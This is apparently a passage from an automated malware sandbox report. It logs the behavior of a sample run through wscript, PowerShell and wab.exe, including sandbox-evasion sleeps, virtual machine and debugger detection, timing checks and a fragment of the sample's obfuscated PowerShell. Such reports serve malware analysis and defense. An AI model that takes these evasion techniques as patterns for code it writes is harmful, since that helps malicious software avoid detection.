        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF887993BFB sldt word ptr [eax]3_2_00007FF887993BFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3943Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5893Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5353Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4377Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.3 %
        Source: C:\Windows\System32\wscript.exe TID: 6248Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 5353 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 4377 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -5534023222112862s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exe TID: 1668Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.1587636884.0000023238D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.O
        Source: wscript.exe, 00000000.00000003.1587421505.0000023238BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
        Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
        Source: wscript.exe, 00000000.00000003.1587549677.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470442461.0000023238C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1471566026.0000023238C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589361392.0000023238CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589286696.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1479603781.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470481390.0000023238C94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470823040.0000023238C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D0t
        Source: powershell.exe, 00000003.00000002.2071733404.000001FCF597A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWoc%SystemRoot%\system32\mswsock.dllrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.iduns
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D1C0 rdtsc 12_2_2028D1C0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B8D8BC LdrInitializeThunk,LdrInitializeThunk,9_2_02B8D8BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A020 mov eax, dword ptr fs:[00000030h]12_2_2020A020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C020 mov eax, dword ptr fs:[00000030h]12_2_2020C020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D903E mov eax, dword ptr fs:[00000030h]12_2_202D903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D903E mov eax, dword ptr fs:[00000030h]12_2_202D903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D903E mov eax, dword ptr fs:[00000030h]12_2_202D903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D903E mov eax, dword ptr fs:[00000030h]12_2_202D903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h]12_2_2022E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h]12_2_2022E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h]12_2_2022E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h]12_2_2022E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5060 mov eax, dword ptr fs:[00000030h]12_2_202E5060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023C073 mov eax, dword ptr fs:[00000030h]12_2_2023C073
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov ecx, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D070 mov ecx, dword ptr fs:[00000030h]12_2_2028D070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20212050 mov eax, dword ptr fs:[00000030h]12_2_20212050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B052 mov eax, dword ptr fs:[00000030h]12_2_2023B052
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B705E mov ebx, dword ptr fs:[00000030h]12_2_202B705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B705E mov eax, dword ptr fs:[00000030h]12_2_202B705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D60B8 mov eax, dword ptr fs:[00000030h]12_2_202D60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D60B8 mov ecx, dword ptr fs:[00000030h]12_2_202D60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021208A mov eax, dword ptr fs:[00000030h]12_2_2021208A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D08D mov eax, dword ptr fs:[00000030h]12_2_2020D08D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023D090 mov eax, dword ptr fs:[00000030h]12_2_2023D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023D090 mov eax, dword ptr fs:[00000030h]12_2_2023D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20215096 mov eax, dword ptr fs:[00000030h]12_2_20215096
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024909C mov eax, dword ptr fs:[00000030h]12_2_2024909C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A0E3 mov ecx, dword ptr fs:[00000030h]12_2_2020A0E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202350E4 mov eax, dword ptr fs:[00000030h]12_2_202350E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202350E4 mov ecx, dword ptr fs:[00000030h]12_2_202350E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202180E9 mov eax, dword ptr fs:[00000030h]12_2_202180E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C0F0 mov eax, dword ptr fs:[00000030h]12_2_2020C0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202520F0 mov ecx, dword ptr fs:[00000030h]12_2_202520F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
